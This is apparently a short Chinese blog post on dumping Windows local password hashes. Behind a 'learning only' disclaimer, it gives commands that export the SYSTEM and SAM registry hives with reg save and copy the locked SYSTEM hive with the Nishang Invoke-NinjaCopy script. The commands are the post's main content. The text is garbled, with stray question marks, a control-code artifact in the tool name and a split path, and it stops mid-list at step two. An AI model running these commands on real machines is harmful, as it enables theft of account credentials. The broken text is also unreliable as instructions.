◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
本文仅用于技术讨论与研究,对于文中所有的工具以及命令,都是本人自行搭建的环境进行测试的。文中使用的技术仅用于学习教育目的,如果文中出现的技术用于其他任何目的及目标,作者概不负责。
1.抓取本地SAM文件中的密码 从注册表中导出
reg save HKLM\SYSTEM sys.hiv ? #获取SYSTEM注册表信息,导出为sys.hiv文件
reg save HKLM\SAM sam.hiv ? ? ? ? ? #获取SAM注册表信息,导出为sam.hiv文件
2.还可以使用nihs_x0008_ng中的Invoke-NinjaCopy.ps1脚本导出
①导出SAM文件 Invoke-NinjaCopy -Path "C:\Windows\System32\con fig\SYSTEM" -LocalDestination "C:\Windows\Temp\PowerShell-master\PowerShell-master\Invoke-NinjaCopy\sys.hiv"
②
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。